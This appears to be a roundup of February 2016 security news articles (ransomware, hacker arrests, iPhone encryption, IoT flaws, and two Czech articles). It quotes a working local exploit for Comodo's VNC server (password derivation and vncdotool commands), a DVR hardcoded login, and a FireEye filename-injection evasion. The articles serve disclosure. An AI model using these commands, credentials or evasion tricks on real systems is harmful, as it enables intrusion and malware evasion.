The Linux Foundation has broken all the barriers of compatibility issues by releasing a Real-Time Operating System (RTOS) for Internet of Things devices, dubbed "Zephyr". This OS enables connected devices to communicate with the same protocol.
So, no more digital barricades between your thermostat and your wearable devices, as they could communicate with each other using the same protocols.
The Zephyr project is supported by multiple platforms like NXP Semiconductors, Synopsys, and UbiquiOS Technology and is licensed under Apache 2.0.
Why is Zephyr so important?
internet-of-things-operating-system
Zephyr stands out from the crowd as it provides a scalable, customizable, secure and open source operating system to be used across multiple architectures.
Doing so, Zephyr could help solve many of the current limitations that prevent, so far, Internet of Things from becoming really mainstream.
Zephyr is expected to take the best of both sides: low-consumption as well as speed.
Here's some key points about Zephyr:
Scalability: Universality of Interconnected devices
Umbrella Platform: All smart devices could run under a single roof.
Baby Footprint Kernel: Zephyr kernel can run on 8kb memory devices
Modularity: Supports to integrate 3rd party modules for additional functions as intended by the developer.
Licensing: As startups does not have to bother about any licensing clash, as a unique license file would be mailed to everyone.
Apart from the special features, Zephyr also supports technologies including Bluetooth, Bluetooth Low Energy, IEEE 802.15.4, 6Lowpan, CoAP, IPv4 and IPv6, NFC, Arduino 101, Arduino Due, Intel Galileo' Gen 2, and NXP FRDM-K64F Freedom board.
Security in Mind

Since connected devices are most hack prone items, these devices may malfunction when gets compromised.
However, Linux is more concerned about the Security of Individuals, and generally open source software is considered more secure, as anyone can inspect flaws and debug the code.
For this, the Linux Foundation is maintaining a dedicated security working group and a delegated security maintainer to be available through IRC Chats, so that anyone could help report the vulnerabilities in open discussions.
Although there are many other alternatives available for Internet of Things RTOS like Brillo from Google, Rocket from Intel, and Ubuntu Core from Canonicals, nothing would be as fascinating as Zephyr.


Locky Ransomware uses AES to encrypt Local Files and Unmapped Network Shares
20.2.2016 Virus

Security researchers discovered a strain of ransomware called Locky that uses AES encryption to encrypt local files and files on network shares.
Security researchers have discovered a new piece of ransomware called Locky, which uses AES encryption algorithm to encrypt both local files and files on network shares, even if they are unmapped.

Security experts at BleepingComputer spotted a new strain of ransomware dubbed Locky that encrypts local files and files on network shares by using the AES encryption.

“A new ransomware has been discovered called Locky that encrypts your data using AES encryption and then demands .5 bitcoins to decrypt your files. ” BleepingComputer reports in a blog post.

The experts noticed that Locky is the second ransomware spotted in the last months that is able to encrypt files on unmapped network shares, a trend that results from the availability online of the source code of ransomware like Hidden Tear.

The Locky ransomware is being spread via malicious emails with Word document attachments that pretend to be an invoice, but that includes malicious macros. When the victim enables macros to view the document, it triggers a downloader for the Locky ransomware. The malware is then downloaded from a remote server and executed.

Like the CryptoWall ransomware, Locky uses to change the filenames of encrypted files to make harder data recovery.

When started, Locky creates and assigns a unique 16 hexadecimal number to the infected machine, then he will scan all drives and unmapped network shares for files to encrypt.

The malware uses the AES encryption algorithm and encrypts only file with extensions matching a certain criteria while it skips files containing certain strings in their full pathname and filename (i.e. tmp, winnt, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, and Windows).

The Locky ransomware encrypts files renaming the to [unique_id][identifier].locky, the researchers also discovered that the unique ID and other information are embedded at the end of the encrypted file.

The malware will also delete all of the copies of documents in the Shadow Volume, making impossible to restore files.

Locky leaves a ransom note, the _Locky_recover_instructions.txtin, in each folder containing encrypted files.

Locky Ransomware

“Inside the Locky ransom notes are links to a Tor site called the Locky Decrypter Page. This page is located at 6dtxgqam4crv6rr6.onion and contains the amount of bitcoins to send as a payment, how to purchase the bitcoins, and the bitcoin address you should send payment to. Once a victim sends payment to the assigned bitcoin address, this page will provide a decrypter that can be used to decrypt their files.” continues the post.

“Locky will change the Windows wallpaper to %UserpProfile%\Desktop\_Locky_recover_instructions.bmp, which contains the same instructions as the text ransom notes.”


15-year-old Teenage Hacker Arrested Over FBI Computer Hack
19.2.2016 Hacking
Another 15-year-old teenager got arrested from the land of cakes, Scotland, by British Police for breaking into the FBI Systems on 16th February.
Under the Britain’s anti-hacking law, Computer Misuse Act 1990, the boy has been arrested for his role in hacking and unauthorized access to the digital material.
Federal Agents had fled to Glasgow in an attempt to carry out a raid on his home before proceeding with the boy's arrest.
"He has since been released and is the subject of a report to the procurator fiscal," a Police Spokesman told a Scottish journal.
As with the present scenario, reports say that the boy could be extradited to the United States to face the Intrusion and hacking charges.
Second Member of the Hacking Group Arrested
The suspect is believed to be an active member of the notorious hacking group called "Crackas with Attitude" aka "CWA", Motherboard confirms.
Another member of the same group got arrested from the United Kingdom last week. The 16-year-old British teenager was suspected of hacking into the CIA and the FBI confidential.
The hacktivist group "Cracka with Attitude" is behind a series of hacks on the United States government and its high-level officials, including:
Leaked the personal and sensitive details of tens of thousands of FBI agents and the US Department of Homeland Security (DHS) employees.
Hacked into AOL emails of CIA director John Brennan.
Hacked into the personal phone accounts and emails of the US spy chief James Clapper.
Broke into AOL emails of the FBI Deputy Director Mark Giuliano.
Last Member of Hacking Group Left
Cracka-with-Attitude
Additionally, it is assumed that only one more member (with a pseudonym "Thwarting Exploits") has been left in the CWA group to get busted, as this got evident from his tweet finalizing the fact that it is a the third member of the group.
Nowadays, the amateurish approach of teenage hackers are hunting down the world's greatest Crime solvers such as FBI and CIA.
The busted cyber criminals are liable to spend their rest of the life behind bars. The cyber laws are strict enough; that it would eat up your whole life years and even beyond your lifetime sometimes.


Now We Know — Apple Can Unlock iPhones, Here's How to Hack-Proof your Device
19.2.2016 Apple
Here's How to Hack-Proof your iOS Device fro Unlock iPhone
Apple has been asked to comply with a federal court order to help the FBI unlock an iPhone 5C by one of the terrorists in the San Bernardino mass shootings that killed 14 and injured 24 in December.
The FBI knows that it can not bypass the encryption on the iPhone, but it very well knows that Apple can make a way out that could help them try more than 10 PINs on the dead shooter's iPhone without getting the device's data self-destructed.
Although Apple refused to comply with the court order and has always claimed its inability to unlock phones anymore, the FBI so cleverly proved that Apple does have a technical way to help feds access data on a locked iOS device.
And this is the first time when Apple has not denied that it can not unlock iPhones, rather it simply refused to build the FBI a Backdoor for the iPhone, in an attempt to maintain its users trust.
So, now we know that Apple is not doing so, but it has the ability to do so.
Now, when you know there are chances that your unlocked iPhone can be accessed by the government even if you have enabled "Auto-Destruct Mode" security feature on your device, you need to protect your iPhone beyond just 4/6-digit passcode.
How to Hack-Proof your iPhone?
Yes, it is possible for you to protect yourself from government snooping just by setting a strong passcode on your iPhone — passcode that the FBI or any government agency would not be able to crack even if they get iPhone backdoor from Apple.
Without wasting much of your time, here's one simple solution:
Simply Set at least random 11-digit numeric passcode for your iPhone.
Here's why (FBI Can't Crack It):
There is only one way, i.e. Brute Force attack, to crack your iPhone passcode. This is what the FBI is demanding from Apple to create a special version of iOS that increases the brute force attempts and ignores the data erasure setting.
iPhones intentionally encrypt its device's data in such a way that one attempt takes about 80 milliseconds, according to Apple.
So, if your iPhone is using a 6-digit passcode and there are 1 Million possible combinations as a whole, it would take maximum time of 22 hours or on average 11 hours to successfully unlock iPhone.
However, if you are using a longer passcode such as a random 11-digit passcode, it will take up to 253 years, and on average 127 years to unlock iPhone.
Doing so will make the FBI or any other agency unable to unlock your iPhone; not unless they have hundreds of years to spare.
To set a strong passcode, click 'Passcode options,' select 'Custom numeric code,' and then enter your new but random passcode.
Things to Avoid While Setting a Passcode
1. Do Not Use a Predictable Passcode: Avoid choosing a predictable string such as your birth dates, phone numbers, or social security numbers, as these are first priorities of attackers to try.
2. Do Not Use iCloud Backups: Avoid using an iCloud backup because doing so will enable the attacker to get a copy of all your iPhone’s data from Apple’s server, where your passcode no longer protects it. This will eliminate the need to guess your passcode.
3. Do Not Use Your Fingerprint: We have seen data breaches that had exposed fingerprints online and also, it is easy to bypass Apple Touch ID Fingerprint scanner. Even fingerprints can be collected from a suspect's corpse. So, using fingerprint security feature could also end up unlocking your iPhone in less time.
So, by choosing a strong passcode, the FBI or any other agency will not be able to unlock your encrypted iPhone, even if they install a vulnerable version of iOS on it.
Warning: You need to remember your passcode, whatever you set, because no one except you would be able to unlock your iPhone. Once you forgot your passcode, there is nothing you can do to get your important data and even access to your iPhone back.


AV-TEST 2015 AWARDs – Which is the best antivirus solutions?
19.2.2016 Virus

2015 awards – For the fifth year in succession the AV-TEST Institute is awarding firms that offered the most efficient IT protection solutions.
On February 17, 2016, the independent institute AV-TEST is awarding the AV-TEST AWARDs to companies who developed antivirus software in 2015. The awards were assigned to products grouped in the categories “PROTECTION”, “PERFORMANCE” , “USABILITY”, “REPAIR” and “ANDROID SECURITY”. The experts divided each category in the user groups of home and corporate users

This is the first time that the AV-TEST awards the most interesting protection solutions in the security industry, the products were tested in the laboratory of the institute throughout the year 2015. The awards are divided into the user groups of home and corporate users

AV-TEST 2015 AWARDS

PROTECTION

The AV-TEST BEST PROTECTION 2015 AWARD is assigned to the best protection software against malware, this year the experts assigned it to Symantec Norton Security for home users, and to Symantec Endpoint Protection in the area of corporate solutions.
PERFORMANCE

The experts analyzed the impact of protection solutions on the speed of a Windows PC and assigned the AV-TEST BEST PERFORMANCE 2015 AWARD in the home user field to the products Bitdefender Internet Security and Kaspersky Internet Security, meanwhile the best corporate solution is Bitdefender Endpoint Security.

USABILITY

Antivirus solutions are becoming even more user-friendly, but experts who tested the different products assigned the AV-TEST BEST USABILITY 2015 AWARD in the area of home users to two products due to a tie score: Avira AntiVirus Pro and Kaspersky Internet Security. The award for the corporate products is assigned to a solution developed by Intel Security with McAfee Endpoint Security.

REPAIR

Which is the best repair tool for Windows systems after a malware attack? The researchers assigned the AV-TEST BEST REPAIR 2015 AWARD to the Avira Antivirus Pro security suite and to the Kaspersky Virus Removal.

ANDROID SECURITY

Let’s close with the best solution to protect Android devices, the experts at AV-Test assigned the AV-TEST BEST ANDROID SECURITY PRODUCT 2015 AWARD to Bitdefender Mobile Security. This solution obtained the best performance throughout all test categories. The second award goes to Sophos Mobile Security.


Thousands of WordPress websites used as a platform to launch DDOS
19.2.2016 Computer Attack

In a recent investigation case, security researchers at Sucuri revealed that 26,000 different WordPress sites were exploited to launch Layer 7 distributed denial of service (DDoS) attacks.
In a recent investigation case, security researchers at Sucuri revealed that 26,000 different WordPress sites were generating a sustained rate of 10,000 to 11,000 HTTPS requests per second against one website, and sometimes even peaked at 20,000. The problem is that any WordPress website could be used to attack the availability of other websites if the pingback feature is enabled (its default setting).

The HTTP flood or Layer 7 attacks would inundate the web server with Layer 7 requests resulting in very large DDoS attacks and disrupt a server by exhausting its resources at the application layer and not at the network layer. They do not require as many requests or as much bandwidth to cause damage; they are able to force a large consumption of memory and CPU on most PHP applications, content management systems (CMS), and databases.

Founder and CTO of Sucuri, Daniel Cid recommends disabling pingbacks on your site. Although It won’t protect you from being attacked, but will stop your site from attacking others.

“The best course of action is to disable pingbacks and if possible, disable xmlrpc altogether if you are not using it. If you are, you can make some very small changes to your .htaccess file to allow only whitelisted IPs to access the file. This might be the case with the popular JetPack plugin.” He said.

wordpress ddoS attacks.jpg
Figure 1 Taken from http://www.tweaktown.com/

It has been known for years that the WordPress pingback service can be abused for DDoS attacks mainly because website owners rarely bother to prevent their site from being added to a botnet. Since the attack is coming from thousands of different IP’s, network-based firewalls will do little to stop the attacks as they only do rate limiting per IP address. The researchers discovered that the majority of IP addresses used in this attack were sites hosted on popular VPS/Cloud/Dedicated server providers: Amazon AWS, Digital Ocean, Google Cloud, Microsoft Azure, Hetzner, OVH and Linode.

The researchers discovered that the majority of IP addresses used in this attack were sites hosted on popular VPS/Cloud/Dedicated server providers: Amazon AWS, Digital Ocean, Google Cloud, Microsoft Azure, Hetzner, OVH and Linode.

wordpress ddoS attacks 2

References:

https://blog.sucuri.net/2016/02/wordpress-sites-leveraged-in-ddos-campaigns.html?utm_campaign=WordPress%20Sites%20Leveraged%20in%20Layer%207%20DDoS%20Campaigns%20blogpost&utm_medium=social&utm_source=linkedin
https://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html
http://www.securityweek.com/wordpress-sites-used-power-layer-7-ddos-attacks?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29
http://news.softpedia.com/news/26-000-wordpress-sites-leveraged-in-layer-7-ddos-attack-500552.shtml
http://www.tweaktown.com/news/50500/26k-wordpress-sites-attacked-clever-layer-7-ddos-attack/index.html


How Just Opening an MS Word Doc Can Hijack Every File On Your System
19.2.2016 Hacking
If you receive a mail masquerading as a company's invoice and containing a Microsoft Word file, think twice before clicking on it.
Doing so could cripple your system and could lead to a catastrophic destruction.
Hackers are believed to be carrying out social engineering hoaxes by adopting eye-catching subjects in the spam emails and compromised websites to lure the victims into installing a deadly ransomware, dubbed "Locky," into their systems.
So if you find .locky extension files on your network shares, Congratulations! You are infected and left with just two solutions: Rebuild your PC from scratch or Pay the ransom.
Locky ransomware is spreading at the rate of 4000 new infections per hour, which means approximately 100,000 new infections per day.
Microsoft MACROS are Back
It is hard to digest the fact that, in this 2016, even a single MS Word document could compromise your system by enabling 'Macros.'
This is where the point to appreciate hacker's sheer brilliance of tactics.
phishing-email-Locky Ransomware
Locky ransomware is being distributed via Microsoft 365 or Outlook in the form of an Invoice email attachment (Word File that embeds vicious macro functions).
The concept of macros dates back to 1990s. You must be familiar with this message: "Warning: This document contains macros."
Now macros are back, as cyber criminals discover a new way to get internet users to open Microsoft Office documents, especially Word files that allow macros to run automatically.
How Does Locky Work?
locky-ransomware-derypt
Once a user opens a malicious Word document, the doc file gets downloaded to its system. However, danger comes in when the user opens the file and found the content scrambled and a popup that states "enable macros".
Here comes the bad part:
Once the victim enables the macro (malicious), he/she would download an executable from a remote server and run it.
This executable is nothing but the Locky Ransomware that, when started, will begin to encrypt all the files on your computer as well as network.
Locky ransomware affects nearly all file formats and encrypts all the files and replace the filename with .locky extension.
Once encrypted, the ransomware malware displays a message that instructs infected victims to download TOR and visit the attacker's website for further instructions and payments.
Locky ransomware asks victims to pay between 0.5 and 2 Bitcoins ($208 to $800) in order to get the decryption key.
One of the interesting note on Locky is that it is being translated into many languages, which heighten its attack beyond English boundaries to maximize the digital casualties.
Locky Encrypts Even Your Network-Based Backup Files
The new ransomware also has the capability to encrypt your network-based backup files. So it's time for you to keep you sensitive and important files in a third party storage as a backup plan in order to evade future-ransomware infections.
A researcher named Kevin Beaumont along with Larry Abrahms of BleepingComputer initially discovered the existence of Locky encrypted virus.
To check the impact of Locky, Kevin successfully intercepted the Locky traffic yesterday and realized that the cryptovirus is spreading out rapidly in the wild.
"I estimate by the end of the day well over 100,000 new endpoints will be infected with Locky, making this a genuine major cybersecurity incident — 3 days in, approximately a quarter of Million PCs will be infected," Kevin said in a blog post.
One hour of infection Statistics:
locky-ransomware
Among the highly impacted countries include Germany, Netherlands, United States, Croatia, Mali, Saudi Arabia, Mexico, Poland, Argentina and Serbia.


Comodo Internet Security opened your PC to attackers
19.2.2016 Hacking

Comodo Internet Security, in the default configuration, installs an application called GeekBuddy that also installs a VNC server enabled by default.
The hackers of the Google Project Zero Team have found another serious security issue in the Comodo’s protection software, it is a VNC server enabled by default with a password easy to guess. It is the second problem discovered in Comodo solution in less than a month, a few days ago the Google expert Tavis Ormandy discovered a significant flaw in the Chromodo browser. The browser, in fact, has ‘Same Origin Policy’ (SOP) disabled by default, a setting that exposes users at risk.

Every time users install one of the Comodo solutions (Comodo Anti-Virus, Comodo Firewall, and Comodo Internet Security) on a Windows PC a program called GeekBuddy is installed too. This application is used by Comodo to carry out remote technical support on the machine.

The GeekBuddy software installs a VNC server enabled by default and having admin-level privileges. The VNC server open to the local network and is not protected by any authentication mechanism.

Technically, an attacker could gain full control over the computer running the Comodo system.

“Comodo GeekBuddy, which is bundled with Comodo Anti-Virus, Comodo Firewall, and Comodo Internet Security, runs a passwordless, background VNC server and listens for incoming connections. This can allow for at least local privilege escalation on several platforms. It also may be remotely exploitable via CSRF-like attacks utilizing a modified web-based VNC client (eg. a Java VNC client).” wrote Jeremy Brown in a blog post published on Packet Storm Security.

Users can fix the issue by enabling password protection, but according to Ormandy the passwords were predictable.

“This is an obvious and ridiculous local privilege escalation, which apparently Comodo believe they have resolved by generating a password instead of leaving it blank. That is not the case, as the password is simply the first 8 characters of SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks). I imagine Comodo thought nobody would bother checking how they generated the password, because this clearly doesn’t prevent the attack they claim it solve” explained Ormandy.

The password is easy to extract from the Windows Registry, the operation could be executed by any logged-in user or by a malware running on the machine.

Ormandy also explained how to calculate the password by using the Win calc.exe.

This information is available to unprivileged users, for example, an unprivileged user can launch calc.exe:

This information is available to unprivileged users, for example, an unprivileged user can launch calc.exe like this:

$ wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks
Caption SerialNumber Signature TotalTracks
VMware, VMware Virtual S SCSI Disk Device -135723213 1997160

$ printf VMware,VMwareVirtualSSCSIDiskDevice-13572321319971601997160 | sha1sum | cut -c-8
7d4612e5

$ printf "key ctrl-esc\ntype calc.exe\nkey enter\n" | vncdotool -p 7d4612e5 -s localhost::5901 -

I'm using vncdotool from here:

https://github.com/sibson/vncdotool

(Note: if there is no SerialNumber field, TotalTracks needs to be repeated twice, I think this is a bug)

Or alternatively you can pull the password out of HKLM, just truncate it to 8 characters(!!!):

$ reg query HKLM\\System\\Software\\COMODO\\CLPS\ 4\\CA /v osInstanceId
HKEY_LOCAL_MACHINE\System\Software\COMODO\CLPS 4\CA
osInstanceId REG_SZ 7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3

Comodo VNC server Windows 7-2016-01-19-15-59-11
Ormandy reported the issue to Comodo on January 19, on February 10 the company released a fix in the version 4.25.380415.167 of GeekBuddy.


Tens of thousands of DVRs exposed on Internet with Hardcoded Passwords

19.2.2016 Hacking

According to a report published by Risk Based Security more than tens of thousands of DVRs are exposed on the Internet with a hardcoded password.
According to a report published by Risk Based Security (RBS), the firmware of DVRs manufactured by China-based Zhuhai RaySharp contains hardcoded credentials that could be used by a remote hacker to gain control of the devices.

“DVRs based on the Zhuhai RaySharp DVR firmware provide a web­based management interface for users to manage the device, view feeds from connected surveillance cameras, and use the PTZ (Pan­Tilt­Zoom) controls. It was found that the interface contains hardcoded credentials that allow anyone to easily access the device. ” states the report.

The digital video recorders include a web interface that allows users to manage the devices, access the recorded video, and control surveillance cameras.

The access to the devices is very simple, they are all configured with the same username “root” and the password “519070.”

There are more than tens of thousands of digital video recorders (DVRs) exposed on the Internet, security experts at Risk Based Security used Shodan revealed that there are between 36,000 and 46,000 DVRs accessible from the web, most of them located in the US.

Vulnerable Shodan DVR on Internet

The security issue is much more extended, according to the experts many other vendors worldwide (i.e. Defender, Lorex, KGuard Security, König, Swann, and COP USA) commercialize digital video recorders using firmware affected by this vulnerability (CVE-2015-8286).

Experts at Risk Based Security reported the vulnerability to the US-CERT in September 2015 that notified all affected vendors in October. Some vendors are working to their own patches but many of them still haven’t solved the problem and RaySharp has yet to release a fix.

The problem affecting DVRs is quite common for IoT devices, poorly configured devices expose them to cyber attacks.


Using SimpliSafe Home Security? — You're Screwed! It's Easy to Hack & Can't be Patched
18.2.2016 Vulnerebility
If you are using a SimpliSafe wireless home alarm system to improve your home security smartly, just throw it up and buy a new one. It is useless.
The so-called 'Smart' Technology, which is designed to make your Home Safer, is actually opening your house doors for hackers. The latest in this field is SimpliSafe Alarm.
SimpliSafe wireless home alarm systems – used by more than 300,000 customers in the United States – are Hell Easy to Hack, allowing an attacker to easily gain full access to the alarm and disable the security system, facilitating unauthorized intrusions and thefts.
…and the most interesting reality is: You Can Not Patch it!
As the Internet of Things (IoT) is growing at a great pace, it continues to widen the attack surface at the same time.
Just last month, a similar hack was discovered in Ring – a Smart doorbell that connects to the user's home WiFi network – that allowed researchers to hack WiFi password of the home user.
How to Hack SimpliSafe Alarms?
According to the senior security consultant at IOActive Andrew Zonenberg, who discovered this weakness, anyone with basic hardware and software, between $50 and $250, can harvest alarm's PIN and turn alarm OFF at a distance of up to 200 yards (30 meters) away.
Since SimpliSafe Alarm uses unencrypted communications over the air, thief loitering near a home with some radio equipment could sniff the unencrypted PIN messages transferred from a keypad to the alarm control box when the house owner deactivates the alarm.
The attacker then records the PIN code on the microcontroller board's memory (RAM) and later replay this PIN code to disable the compromised alarm and carry out burglaries when the owners are out of their homes.
Moreover, the attacker could also send spoofed sensor readings, like the back door closed, in an attempt to fool alarm into thinking no break-in is happening.
Video Demonstration of the Hack
You can watch the video demonstration that shows the hack in work:

"Unfortunately, there's no easy workaround for the issue since the keypad happily sends unencrypted PINs out to anyone listening," Zonenberg explains.
Here's Why Your Smart Alarms are Unpatchable
Besides using the unencrypted channel, SimpliSafe also installs a one-time programmable chip in its wireless home alarm, leaving no option for an over-the-air update.
"Normally, the vendor would fix the vulnerability in a new firmware version by adding cryptography to the protocol," Zonenberg adds. But, "this isn't an option for the affected SimpliSafe products because the microcontrollers in currently shipped hardware are one-time programmable."
This means there is no patch coming to your SimpliSafe Alarm, leaving you as well as over 300,000 homeowners without a solution other than to stop using SimpliSafe alarms and buy another wireless alarm systems.
Zonenberg said he has already contacted Boston-based smart alarm provider several times since September 2015, but the manufacturer has not yet responded to this issue. So, he finally reported the issue to US-CERT.


VXE Flaw allowed threats to bypass FireEye detection engine
18.2.2016 Vulnerebility

Researchers at Blue Frost Security firm discovered a flaw in the FireEye Virtual Execution Engine (VXE) that allows an attacker to completely bypass virtualization-based dynamic analysis and whitelist malware.
Security researchers at Blue Frost Security have found a high severity vulnerability in FireEye products that allowed an attacker to bypass the company’s detection engine and temporarily whitelist malware.

The experts reported the flaw to FireEye in September 2015, the company promptly patched the issue and released and an update of the FireEye Operating System (FEOS). FireEye also requested Blue Frost to wait until mid-February to disclose the flaw because many customers had still not applied the updates.

The flaw resides in the FireEye’s Virtual Execution Engine (VXE), a crucial component of the defense solutions that performs dynamic analysis on files. The component is used is several products of the FireEye portfolio, including the FireEye Network Security (NX), the Email Security (EX), the Malware Analysis (AX), and the File Content Security (FX).

1245812-fireeye

Every time the FireEye’s Virtual Execution Engine analyzes a binary present on a Windows machine it copies it into a virtual machine with the name “malware.exe.” Before the file is analyzed, the engine executes a script to copy the binary to a temporary location and rename it to its original filename.

The experts discovered that the software doesn’t sanitize the original filename allowing an attacker to use Windows environment variables inside the original filename which are resolved inside the batch script.

“FireEye is employing the Virtual Execution Engine (VXE) to perform a dynamic analysis. In order to analyze a binary, it is first placed inside a virtual machine. A Windows batch script is then used to copy the binary to a temporary location within the virtual machine, renaming it from “malware.exe” to its original file name.

copy malware.exe "%temp%\fire_in_the_eye.exe"
No further sanitization of the original filename is happening which allows an attacker to use Windows environment variables inside the original filename which are resolved inside the batch script. Needless to say this can easily lead to an invalid filename, letting the copy operation fail.” states the security advisory from Blue Frost.

“Let’s take the filename FOO%temp%BAR.exe which results in:

copy malware.exe "%temp%\FOOC:\Users\admin\AppData\Local\TempBAR.exe" The filename, directory name, or volume label syntax is incorrect. 0 file(s) copied.
The batch script continues and tries to execute the binary under its new name which of course will fail as well because it does not exist.”

The batch script attempts to execute the file in the virtual machine monitoring for malicious behavior, but the filename is invalid and causes the failure of the copying operation. As result, the file is no longer executed and the engine is no able to detect malicious activity. At this point, the Virtual Execution Engine considers the file clean and add its MD5 hash to a whitelist of binaries that have already been analyzed and that will no longer be analyzed until the next day.

“Once a binary was analyzed and did not show any malicious behavior, its MD5 hash is added to an internal list of binaries already analyzed. If a future binary which is to be analyzed matches an MD5 hash in this list, the analysis will be skipped for that file. The MD5 hash will stay in the white list until it is wiped after day.” Blue Frost Security said in its advisory. “This effectively allows an attacker to whitelist a binary once and then use it with an arbitrary file name in a following attack. The initial binary with the environment variable embedded in its filename could e.g. be hidden in a ZIP file together with several other benign files and sent to an unsuspicious email address. Once this ZIP file was downloaded or sent via email a single time, the MD5 hash of the embedded malware would be whitelisted and the binary could then be used with an arbitrary file name without detection.”

FireEye is one the most important firm in the security industry and immediately worked on the development of a security patch (FX 7.5.1, AX 7.7.0, NX 7.6.1 and EX 7.6.2) which have been already released.

“FireEye encourages all customers to update their systems to the latest released version where noted below. FireEye has issued maintenance releases and fixes for all security issues contained within this advisory. ” states the company.

FireEye confirmed that it has not seen any active exploits of the evasion technique against its customers.


A sophisticated variant of OceanLotus trojan targets OS X systems
18.2.2016 Apple

In May 2015, the Chinese security firm Qihoo 360 published a report on a Trojan called OceanLotus that was being used since 2012 for APT attacks in the Chinese market.
The APT attacks based on the OceanLotus focused on government organizations, research institutes, maritime agencies, and companies specializing in other activities.

At the time were found four different versions of the Trojan, and one of them was specifically designed to target OS X systems.

OceanLotus infections

AlienVault analyzed two of these samples available for OS X (one of them being probably an early version). A more recent variant was analyzed and was updated to Virustotal on February 8 and had a zero detection rate, at the time I was writing this post the OceanLotus malware was detected by 11 / 55 antivirus solutions, including ESET-NOD32, Ikarus, F-Secure and Bitdefender.

As the title of the article says, the Trojan is disguised as an Abode Flash Player update.

The developers of the Trojan used a XOR encryption because with this technique its more difficult to detected. The commands used by the API shows that developers are familiar with OS X commands, and this makes sense because OnceanLotus has a specific version of OS X.

When a system is infected, OnceanLotus prepares an agent to attempt to contact his command and control (C&C) servers. When getting a connection with the C&C servers, the Trojan will collect information from the infected system, including device name, username, and a unique ID, and determines if the victim has root privileges.

The malware has the capability to perform many tasks, like opening application bundles, returning information about a file or path, getting a list of recently opened documents, obtaining information on active windows, capturing screenshots, downloading files from a URL, executing files, killing a process, and deleting files.

“The OS X version of OceanLotus is clearly a mature piece of malware that is written specifically for OS X. The use of OS X specific commands and APIs is evidence that the authors are intimately familiar with the operating system and have spent quite a bit of time customizing it for the OS X environment. Similar to other advanced malware, the use of obfuscation and indirection within the binary are an indication that the authors want to protect their work, make it difficult for others to reverse engineer, and reduce detection rates. The fact that VirusTotal still shows a zero detection rate for this threat shows they are succeeding at the latter.” States the analysis published by Alien Vault.

I will also leave you here the Indicator of compromise ( IOC):

Hashes:

ROL3 encoded .en_icon: 9cf500e1149992baae53caee89df456de54689caf5a1bc25750eb22c5eca1cce

ROL3 decoded .en_icon: 3d974c08c6e376f40118c3c2fa0af87fdb9a6147c877ef0e16adad12ad0ee43a

ROL3 encoded .DS_Stores: 4c59c448c3991bd4c6d5a9534835a05dc00b1b6032f89ffdd4a9c294d0184e3b

ROL3 decoded .DS_Stores: 987680637f31c3fc75c5d2796af84c852f546d654def35901675784fffc07e5d

EmptyApplication: 12f941f43b5aba416cbccabf71bce2488a7e642b90a3a1cb0e4c75525abb2888

App bundle

83cd03d4190ad7dd122de96d2cc1e29642ffc34c2a836dbc0e1b03e3b3b55cff

Another older variant that only communicates with the unencrypted C2

a3b568fe2154305b3caa1d9a3c42360eacfc13335aee10ac50ef4598e33eea07

C2s:

kiifd[.]pozon7[.]net

shop[.]ownpro[.]net

pad[.]werzo[.]net

Dropped Files:

/Library/.SystemPreferences/.prev/.ver.txt or ~/Library/.SystemPreferences/.prev/.ver.txt

/Library/Logs/.Logs/corevideosd or ~/Library/Logs/.Logs/corevideosd

/Library/LaunchAgents/com.google.plugins.plist or ~/Library/LaunchAgents/com.google.plugins.plist

/Library/Parallels/.cfg or /~Library/Parallels/.cfg

/tmp/crunzip.temp.XXXXXX (passed to mktemp(), so the actual file will vary)

~/Library/Preferences/.fDTYuRs

/Library/Hash/.Hashtag/.hash (or ~/Library/Hash/.Hashtag/.hash)


V americké nemocnici se rozšířil ransomware, musela zaplatit 400 tisíc jako výkupné
18.2.2016 Zdroj: Zive.cz
Viry
Ransomware je jednou z nejzákeřnějších forem malwaru – většinou se postará o zašifrování dat na disku a pro získání klíče vyžaduje výkupné – většinou prostřednictvím platby v Bitcoinech. Pokud se jedná běžný osobní počítač, rozhodně to majitele naštve, jenže podobný případ potkal i nemocnici v Los Angeles, kde ransomware způsobil vážné potíže. Došlo i k přemisťování pacientů do okolních nemocnic.

Škodlivý software se v Hollywood Presbyterian Medical Center rozšířil na několik počítačů a znepřístupnil data pacientů a důležité interní systémy. Po několika dnech, kdy se do řešení případu zapojila i FBI, nemocnice přistoupila k zaplacení požadované částky. Ačkoliv původní spekulace hovořili o milionech, nakonec bylo východiskem 40 bitocinů, tedy asi 17 000 dolarů (413 000 korun).

Hollywood_Presbyterian_Medical_Center_2015-05-10.jpg
Hollywood Presbyterian Medical Center v Las Angeles

Nemocnice jsou přitom pro útočníky poměrně jednoduchým cílem. Velká část používá zastaralé operační systémy a podle webu Arstechnica to často bývá Windows 2000, který Microsoft už několik let nezáplatuje ani v rámci rozšířené podpory.

ransomware.jpg
Tradiční výzva po nakažení - zaplať nebo se ke svým datům nedostaneš

Ransomware se nejčastěji šíří jako spustitelné aplikace v rámci e-mailových příloh. Opět tedy platí základní pravidlo – otevírat jen ty přílohy, kde je stoprocentní jistota, že se nejedná o škodlivý software. Pokud si uživatel s rozpoznáním není jistý, neměl by v jeho systému chybět antivirový balík.


Apple brání své šifrování v iOS. Proti němu stojí FBI a boj proti terorismu

18.2.2016 Zdroj: Lupa.cz Mobilní

Už pár měsíců se snaží americká FBI najít páku k oslabení zabezpečení v iPhonech. Zatím u soudů narážela, ale nakonec jí „pomohla“ střelba v San Bernardinu.
Jak se dostat do zamčeného iPhonu. Kauza, která proti sobě opět svedla zástupce IT světa a americké úřady. Apple odmítá prorazit vlastní ochranu a odemknout vyšetřovatelům iPhone jednoho ze sanbernardských střelců. „Je to bezprecedentní krok, kterým bychom zasáhli do soukromí našich uživatelů,“ tvrdí šéf Applu Tim Cook v dlouhém vzkazu zákazníkům firmy.

Po kauze PRISM je tu další střet o soukromí a důvěru, kterou firmy ze Silicon Valley nutně potřebují. Soudní bitva má tak jedno velké téma – mají bezpečnostní složky státu zasahovat do toho, jak IT firmy píší kód svých programů?

